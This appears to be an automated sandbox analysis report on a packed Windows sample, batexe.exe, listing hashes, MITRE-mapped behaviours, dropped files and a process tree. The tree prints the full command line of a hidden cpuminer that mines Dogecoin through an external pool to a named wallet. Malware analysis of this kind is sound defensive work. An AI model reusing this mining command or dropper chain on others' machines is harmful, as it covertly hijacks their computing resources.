73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 15:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
3792	b2e.exe
2672	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
2672	cpuminer-sse2.exe
2672	cpuminer-sse2.exe
2672	cpuminer-sse2.exe
2672	cpuminer-sse2.exe
2672	cpuminer-sse2.exe
2672	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/752-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 752 wrote to memory of 3792	752	batexe.exe	84
PID 752 wrote to memory of 3792	752	batexe.exe	84
PID 752 wrote to memory of 3792	752	batexe.exe	84
PID 3792 wrote to memory of 4732	3792	b2e.exe	85
PID 3792 wrote to memory of 4732	3792	b2e.exe	85
PID 3792 wrote to memory of 4732	3792	b2e.exe	85
PID 4732 wrote to memory of 2672	4732	cmd.exe	88
PID 4732 wrote to memory of 2672	4732	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:752
- C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76D1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe

Filesize
1.3MB

MD5
100ac625e11290aa700e36523f1c8197

SHA1
80637ea3c44210aa5b2e66ad27130fa9a18187f1

SHA256
d392bd95a7d5712876026214112aae5639db4da399c69aabf1adfe85166d1e35

SHA512
213b087b6d5534ccc1f4c6f6c3fcec77ff0cde08ded6e14c459b7474978ed428684d329e5638ca3e3fae79b430fb9f90e07dcb681fd70c517b4c83b0ac6aa4d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe

Filesize
1.3MB

MD5
e98c022461438f6387b2aa2807aa87b1

SHA1
689ed645f87d9c3f43d84e7d3f1a70d557988c4f

SHA256
860b97128c5d8a682daf7b89e54d70b0b6d1e433c3d160d86169a17468a049aa

SHA512
7fa55a1bf552c9f58f6c1c6664958b3a446eb0867120332049017be57baf2daf1eb2f55e3ba185efe0847856ebc8862dc18984af67be2fe372f8eb248346eba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F0.tmp\b2e.exe

Filesize
1.2MB

MD5
d5c3cd4b023d479e4c2749b1d3ed17ab

SHA1
feb3f62d6145a8b1365da51097f23ae5718b2f76

SHA256
b2a407a4b225354fb5fd1ba77a6a3fd812cc986382f3dade6ab01cd9b235bb92

SHA512
dc3047c187dda8372ebd0e1fe93d7b5c612d64944cfdbacc8eb0c176bdc749dba8925d2c72e3595f5ee43fe8f3381bdefc7c2f71eccd6324ddea45e1e8d23c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\76D1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
425KB

MD5
2ed4e2222b4e291930f1140dc3e18ceb

SHA1
bdf2793ee60edc07ad52c9fdba52af94bec2d0b2

SHA256
c23a712a35b802395c65a36609be49e340eba36e854f0f2f7d6abaa13ca9a412

SHA512
d41203dc50b76cf3c878ba4cad21e7f464cf6c7f8a4478b12081e167437b1d080c404275bd0c382effc6d391ac23a35d6f0730f7f51dd393f635c1ae3d7765ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
201KB

MD5
21494834a09c46ae9c353e07db988e7c

SHA1
9545b9ac0fea671448eefeefb2b0f7d03f0c0044

SHA256
80f4471f8cc4fd299e67e1e0827b6150416fdd351c8acb1afa9189f81ca4c7ef

SHA512
a7903694af96c1481bbae2db318957e090cc1ec5d4123c88ddcbc40eaf2765a858a934d8e81c0b74bdd5be177bb7fc7eb8af48ef8d2a5a496f6f1c7838390b9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
294KB

MD5
1772c6737143f56d6d8cfbf50b65a3f4

SHA1
f2c7e9fa1a9ed34c09ee5e225bdebb68b6749446

SHA256
84740f510dc204f2684ed7c5d15f407dfb53f47ca6cc47dc53d07835bea2469b

SHA512
6345b944ba90828c98e61cb1cef70617dfa457597ea4414c2605eb3e14987efa0db32b7463471bd0277fd5a0d79071a4766c3de207580ce3b11e70887988024b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
202KB

MD5
b476dc01e7f31d51b1d706eec6a805d4

SHA1
e3e98c9e89dfc5231a7317e53c2549c1cf50efaa

SHA256
5d006e8ceb4dbcb9760f4d4a15165ecb42f786c930177d463cfb9900a5d342b0

SHA512
c537ee2c10137354b297447be47960fb7825d84d857520bc3a67559e8e1f40b120d0d92289975c5272c4025810b7b9cbf962c0eb340797a3518897b48eca41f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
98KB

MD5
f69d2a889eb725b62645e4a2f33d2bbb

SHA1
02edf67ea9f781125ac7f9de25475e2e4e4ca45f

SHA256
cf28bb41f75b521a5d0c8799b9c8313b37f4efbd0e0a015dd6a568d9e37c8756

SHA512
7aa39fb984d34b13e33ffe2ec7043b39d2ca8ee3ef87a7c0d8e268ebe51f533ea5cb44364e2b907c2281910e3b43831f6aa278180e5b900233fc929d4b891ea7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
268KB

MD5
172514e0d9fa7d1e7300f7a8f4da61d2

SHA1
537a8a78456465e56b72abfe16609bbb3a119c63

SHA256
73f3e759456aba9ce62fa589b729f7c803b52b92e5bba3a557c7160496db5a54

SHA512
03934ef030e1b6990cfdc7404b72d6142df16f616968969b2272d32d5354d63e91b626b83eac4bdf180cc40392ae2253a9a408fc46aac539d76012b777067374

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
63KB

MD5
a59cb5870a566762bc505e7e5a750120

SHA1
94ce768e3e25940b73f367ad8a59616de933d20b

SHA256
c49f2ca8f990f70fd6a4b6ad3aafa14212d137377697ce7fbb0566338b940c09

SHA512
c862264ae89932ab17217ef2d324723286d7b29283da26230c9a13cec6ff96ceb5f11bae6fecd8b190fe51f9fec2d957c9e99679e9afef39d9f310bcbdd651f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
481KB

MD5
750bfa7b1ddc0e735629029cc05bf129

SHA1
5e278bf4340d79bec7e5025d0351a501a43a6f68

SHA256
e4533cca79ed5400cff0ec2892c507092907af35cc4822cfa810698c080e642c

SHA512
b9d7431a001e6f5c1257f121e8292206ca2eac84e7a95c59fb51a40808a89f38757dab92d5e37e40faa6cdf9450709f77710963677ea3832d41fa3cba489a9ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
347KB

MD5
b7be11d9c998d16a4806f9a58524f776

SHA1
56d4e4ef6819004b7543f7a019b5a1399eed9985

SHA256
3ef6ac2fcb287e563fc35d5b9ed5b7286d3fbba30dcfc5b1e306990892a96b81

SHA512
244e19e93c22b57ed05a715e876aead69c25acd358609071907688a869a85889652a3f980b5b307835caca9ab83ab691a531f0147885863ca5d7fafc532c81cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
163KB

MD5
e9210f1de0999861028ba230aad00ac5

SHA1
822a825105972dd6da362b3680d8a0ddc0c37df3

SHA256
d916d1ffcf0f062f24ddcdee4963c1d475ce6a0121653579b4086e3a8c9d6853

SHA512
0bdbe75bf090811ea44dccca64037ec02d353f62ef36ecd9eccc329c35413542509e60b2b77abbf72e079eef7183b7e72bcd0cd944d89ab1cbec6917282fd567

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
86KB

MD5
695174af71a9b53a59767587f5472df8

SHA1
ba51458437bfc4852ff60b133d24401c95666399

SHA256
6970c1eab3cda70af50ac1542f5661657e2cf2d72fe4cf4f0399cec074c3cf07

SHA512
6b166f9f611f4c5941da93a1113660d817a7add4b32d1c2657f80bf63493ffa1f97ccf798ab92b63df8a7e07ad535e1d2d05b45a128300781c1246aea8716c6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
48KB

MD5
1ab869e94a2b52cd88e8efcf19da2a97

SHA1
bc129c4caff8f6ffb945d2d37e26e71cef1424f4

SHA256
79e797cc482c9e5e6345b7b6f90accaf61c8dcba516d318ead88e36e2d0f1dd0

SHA512
4fded7e4803ec8a7d436661a23b4177a7daff6d6bcb7c32ca99003551dc2c432e96fb5dd7c57373ad289301de73680e7b5b7e150dce77d109bec378bc7e08a4b

Download Submit
memory/752-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2672-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2672-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/2672-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2672-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/2672-49-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/2672-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2672-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3792-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3792-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download